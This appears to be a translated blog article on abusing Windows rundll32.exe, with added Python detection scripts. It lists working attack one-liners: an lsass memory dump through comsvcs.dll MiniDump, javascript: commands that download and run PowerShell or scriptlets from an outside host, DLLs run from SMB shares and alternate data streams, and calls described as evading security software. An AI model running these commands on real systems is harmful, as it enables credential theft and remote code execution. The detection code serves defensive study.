Dig into the various "abuse methods" of Rundll32.exe and what makes it "special".

Malware authors often write malware that mimics legitimate Windows processes. Therefore, we may see malware disguised as svchost.exe, rundll32.exe, or lsass.exe processes, taking advantage of the fact that most Windows users may not be aware of the behavior of these system processes under normal circumstances. In this article, we will dig deeper into rundll32.exe to gain some understanding of it.

  • About Rundll32.exe

As the name suggests, the rundll32.exe executable file is used to run a DLL (RUN DLL), that is, to run a dynamic link library.

In MSDN, the definition of DLL is as follows:

A dynamic link library (DLL) is a module that contains functions and data that can be used by another module (an application or DLL).

The following is the most basic syntax for using rundll32.exe:

  • rundll32 <dllname>,<entrypoint> [optional arguments]

The rundll32.exe executable can be either a child process or a parent process, depending on the execution context. To decide whether a given instance of rundll32.exe is malicious, we need to confirm two things: first, the path it was launched from, and second, its command line.

The legitimate RUNDLL32.EXE process is always located at:

\Windows\System32\rundll32.exe

\Windows\SysWOW64\rundll32.exe (32-bit version on 64-bit systems)

As for the command line of the rundll32.exe instance, it all depends on what you want to run, such as CPL files, DLL installation, etc.

Below we will introduce in detail a series of rundll32.exe calls and their corresponding functions. 


Case:

  • SHELL32.DLL – “OpenAs_RunDLL”

Rundll32.exe can also execute specific exported functions in a DLL. For example, when you select a file and right-click, a context menu appears with several options. One of them is "Open with". After clicking it, a pop-up window appears in which you can choose from the applications installed on your system.

Behind this process, shell32.dll and its OpenAs_RunDLL function are started through the rundll32.exe utility, which is equivalent to executing the following command in the background:

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL <file_path>

Take modifying the hosts file as an example. Execute the following command through WIN+R to pop up the selection window: 

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts

 

Calling specific exported functions in a DLL this way is very common, so it is unrealistic to know every such function in advance.


  • SHELL32.DLL – “Control_RunDLL”

Another pair of shell32.dll functions commonly seen with rundll32.exe is Control_RunDLL and Control_RunDLLAsUser. Both are used to run .CPL files, that is, Control Panel applets.

For example, if we want to change the computer's date and time, we can launch the corresponding applet from the Control Panel.

Behind the scenes, Windows actually starts an instance of rundll32.exe using the following command line. 

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl

Open the Windows Firewall applet:

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl

 

Obviously, the CPL file here can also be replaced with a malicious file, so once a suspicious path and file name appears, we need to use other tools to check its legitimacy.

In addition to checking the .CPL file, when the Control_RunDLL or Control_RunDLLAsUser function is used you should also check the legitimacy of the .DLL file the command line points to.

  • DLL function calls

If an attacker carries out the attack using a legitimate DLL file, traditional detection methods struggle and defense becomes much harder. One example is using the MiniDump function in comsvcs.dll to dump the memory of a target process in order to steal credentials; refer to here:

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full

Similarly, advpack.dll, originally intended to help hardware and software installers read and verify .INF files, can also be used by attackers for code execution. Please refer to here:

c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\360\360.png,DefaultInstall

Of course, many variants of these attack methods appear in practice, used to bypass conventional detection methods. For example, the MiniDump function can also be called by its ordinal, #24, instead of by name. Interested readers can take a look here:


  • Execute DLL from SMB share 
rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint

Use Rundll32.exe to execute a DLL from an SMB share. EntryPoint is the name of the exported function in the .DLL file to be executed.

Use case: Executing DLL from SMB share.
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Execute JavaScript script 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://www.chwm.vip/');")

Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script downloaded from a remote website.

Use case: Code execution from the Internet
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Execute an external program
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

Use Rundll32.exe to execute a JavaScript script that runs calc.exe.

Use case: Proxy execution
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Execute an external program and kill the rundll32.exe process
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the rundll32.exe process that started it.

Use case: Proxy execution
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

  • Execute a remote JavaScript script 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.chwm.vip/test/test.js")

Use Rundll32.exe to execute a JavaScript script that loads remote JavaScript.

Use case: Code execution from the Internet
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Execute VBScript script code 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.execScript("msgbox('a')","vbs");window.close()

Use Rundll32.exe to execute VBScript code.

Use case: Proxy execution
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Load a registered or hijacked COM server   
rundll32.exe -localserver <CLSID_GUID>
rundll32.exe -sta <CLSID_GUID>

Use Rundll32.exe to load a registered or hijacked COM server payload. Also works with ProgID. 

Both can be used to load maliciously registered COM objects.

To verify such a call, check the corresponding registry key under HKEY_CLASSES_ROOT\CLSID\.

It is recommended that you read the following article to learn more about this technology.

https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/

Use case: Execute DLL/EXE COM server load or ScriptletURL code.
Required permissions: User
Operating system: Windows 10 (and possibly previous versions), Windows 11 
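To verify what a -localserver or -sta call would actually load, a defender resolves the CLSID under HKEY_CLASSES_ROOT\CLSID and checks where the registered server lives. The following Python is an added example, not code from the original article or from the bohops post linked above: on Windows it reads the InprocServer32, LocalServer32 and ScriptletURL subkeys through winreg; elsewhere it assesses a constructed registry snapshot whose GUIDs, paths and URL are placeholders, not real class ids.

```python
import re

try:
    import winreg  # Windows only; the snapshot-based path below runs anywhere
except ImportError:
    winreg = None

# Subkeys under HKCR\CLSID\{guid} that decide which code a COM activation loads.
SERVER_KEYS = ("InprocServer32", "LocalServer32", "ScriptletURL")
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE_HINTS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def read_clsid_servers(clsid):
    """Read the default value of each server subkey under HKCR\\CLSID\\{clsid} (Windows only)."""
    if winreg is None:
        raise RuntimeError("winreg is not available on this platform; pass a snapshot instead")
    servers = {}
    for sub in SERVER_KEYS:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, "CLSID\\%s\\%s" % (clsid, sub)) as key:
                servers[sub] = winreg.QueryValueEx(key, "")[0]  # the (Default) value
        except OSError:
            continue  # subkey absent for this CLSID
    return servers


def _server_binary(value):
    # LocalServer32 may hold '"C:\path\x.exe" /args'; InprocServer32 holds a DLL path.
    value = value.strip()
    token = value[1:value.index('"', 1)] if value.startswith('"') else value.split()[0]
    # Expand the one variable commonly seen in these values; lower-case for comparison.
    return re.sub(r"%systemroot%", lambda _: "c:\\windows", token, flags=re.I).lower()


def assess_clsid(clsid, servers):
    """Return findings for the servers registered under one CLSID; [] means nothing unusual."""
    findings = []
    if not servers:
        return ["%s: no server registered, the -localserver/-sta call would load nothing" % clsid]
    if "ScriptletURL" in servers:
        findings.append("%s: ScriptletURL points at %s, the COM load fetches and runs a scriptlet"
                        % (clsid, servers["ScriptletURL"]))
    for key in ("InprocServer32", "LocalServer32"):
        if key not in servers:
            continue
        binary = _server_binary(servers[key])
        if not binary.startswith(TRUSTED_PREFIXES):
            findings.append("%s: %s resolves to %s, outside the usual program locations"
                            % (clsid, key, binary))
        if any(h in binary for h in USER_WRITABLE_HINTS):
            findings.append("%s: %s lives in a user-writable location (%s)" % (clsid, key, binary))
    return findings


def assess_snapshot(snapshot):
    """Assess every CLSID in a {clsid: {subkey: value}} snapshot."""
    return {clsid: assess_clsid(clsid, servers) for clsid, servers in snapshot.items()}


# Constructed HKCR\CLSID snapshot: the GUIDs, the update.exe path and the URL are placeholders.
SNAPSHOT = {
    "{00000000-0000-0000-0000-00000000000a}": {"InprocServer32": r"%SystemRoot%\system32\shell32.dll"},
    "{00000000-0000-0000-0000-00000000000b}": {"LocalServer32": r'"C:\Users\Public\update.exe" /embedding'},
    "{00000000-0000-0000-0000-00000000000c}": {"ScriptletURL": "https://example.invalid/payload.sct"},
    "{00000000-0000-0000-0000-00000000000d}": {},
}

if __name__ == "__main__":
    for clsid, findings in assess_snapshot(SNAPSHOT).items():
        print(clsid, "->", findings or ["ok"])
```

On a live host, replace the snapshot with `{clsid: read_clsid_servers(clsid)}` for the CLSID seen on the rundll32 command line; a server binary under a user-writable directory or a ScriptletURL subkey is what a hijacked registration typically looks like.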


  • Execute commands to bypass security software
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe

rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe

rundll32 url.dll, FileProtocolHandler calc.exe

These calls were found by disassembling and analyzing url.dll; they can bypass most security software.

Use case: Proxy execution
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Alternate data stream
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain

Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).

Use case: Execute code from an alternate data stream
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11


  • Execute HTML code
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication <HTML code>

Use Rundll32.exe to call mshtml.dll to run HTML code.

Use case: Proxy execution
Required permissions: User
Operating system: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
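Putting the two criteria from the start of the article (launch path and command line) together with the catalog above, the following Python is an added detection example, not code from the original article: it triages constructed Sysmon-style process-creation records (Image and CommandLine fields) and reports which of the catalogued patterns each one matches. The PID 1234, the example.invalid host, the {CLSID-PLACEHOLDER} value and helper.dll are placeholders, and the records are modelled on the commands shown above rather than taken from real telemetry.

```python
import re

# Legitimate on-disk locations of rundll32.exe (compared case-insensitively).
LEGIT_IMAGES = {
    "c:\\windows\\system32\\rundll32.exe",
    "c:\\windows\\syswow64\\rundll32.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# First token of the command line is the image (optionally quoted); the rest are the arguments.
CMD_RE = re.compile(r'^\s*(?:"[^"]+"|\S+)\s*(?P<args>.*)$', re.S)
# rundll32 argument grammar: <dll>[,<entrypoint>] [args]. The DLL may be quoted, and a space
# after the comma (as in "comsvcs.dll, MiniDump") is tolerated, so it is tolerated here too.
ARG_RE = re.compile(
    r'^(?:"(?P<qdll>[^"]+)"|(?P<dll>[^\s,]+))\s*(?:,\s*(?P<entry>\S+))?\s*(?P<rest>.*)$', re.S)


def _under_system_dirs(path):
    return path.lower().startswith(SYSTEM_DIRS)


def _has_ads(path):
    # A colon anywhere after the drive letter means a file:stream (ADS) reference.
    return ":" in re.sub(r"^[a-z]:", "", path.lower())


def analyze(event):
    """Return a list of findings for one process-creation record; [] means nothing suspicious."""
    findings = []
    if event["Image"].lower() not in LEGIT_IMAGES:
        findings.append("image outside System32/SysWOW64: " + event["Image"])
    args = CMD_RE.match(event["CommandLine"]).group("args").strip()
    low = args.lower()
    if low.startswith("javascript:"):
        findings.append("javascript: protocol handler (mshtml RunHTMLApplication) script execution")
        if re.search(r"activexobject|getobject\(|execscript", low):
            findings.append("script payload creates objects or pulls a remote script")
        return findings
    m = re.match(r"[-\u2013](localserver|sta)\s+(\S+)", low)
    if m:
        findings.append("COM server load via -%s %s (verify the HKCR\\CLSID registration)" % m.groups())
        return findings
    m = ARG_RE.match(args)
    if not m:
        return findings
    dll = (m.group("qdll") or m.group("dll") or "").lower()
    entry = (m.group("entry") or "").lower()
    rest = m.group("rest").strip()
    base = dll.rsplit("\\", 1)[-1]
    if dll.startswith("\\\\"):
        findings.append("DLL loaded from a UNC/SMB path: " + dll)
    elif _has_ads(dll):
        findings.append("DLL loaded from an alternate data stream: " + dll)
    elif "\\" in dll and not _under_system_dirs(dll):
        findings.append("DLL path outside the Windows system directories (check its signer): " + dll)
    if base == "comsvcs.dll" and entry in ("minidump", "#24"):
        findings.append("comsvcs.dll MiniDump: process memory dump, likely credential theft")
    elif base == "advpack.dll" and entry == "launchinfsection":
        findings.append("advpack.dll LaunchINFSection: code execution through an INF section")
    elif base == "url.dll" and entry in ("openurl", "openurla", "fileprotocolhandler"):
        findings.append("url.dll %s: proxy execution of an arbitrary file" % entry)
    elif base == "shell32.dll" and entry in ("control_rundll", "control_rundllasuser"):
        cpl = rest.split()[0].strip('"') if rest else ""
        if not _under_system_dirs(cpl):
            findings.append("Control_RunDLL with a CPL outside the system directories: " + cpl)
    return findings


def suspicious_count(events):
    return sum(1 for e in events if analyze(e))


# Constructed Sysmon-style records modelled on the commands in this article (placeholders noted above).
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts"},
    {"Image": r"C:\WINDOWS\System32\rundll32.exe",
     "CommandLine": r"C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 1234 C:\temp\lsass.dmp full"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/test.js")'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe -localserver {CLSID-PLACEHOLDER}"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain'},
    {"Image": r"C:\Users\Public\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\helper.dll,Run"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["CommandLine"])
        for f in analyze(e) or ["(no findings)"]:
            print("  -", f)
```

The two benign records (OpenAs_RunDLL on the hosts file and Control_RunDLL on timedate.cpl) produce no findings, while every catalogued pattern produces at least one. The "DLL path outside the Windows system directories" check is deliberately a prompt to verify the file's signer rather than an alert on its own, since legitimate software under Program Files also launches rundll32.exe with its own DLLs.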


Summary

Thank you for reading. I hope you can learn more about Rundll32.exe through this article. 

There are more ways to abuse Rundll32.exe, and this article will be updated continuously...


Reposted from: blog.csdn.net/qq_39190622/article/details/132165872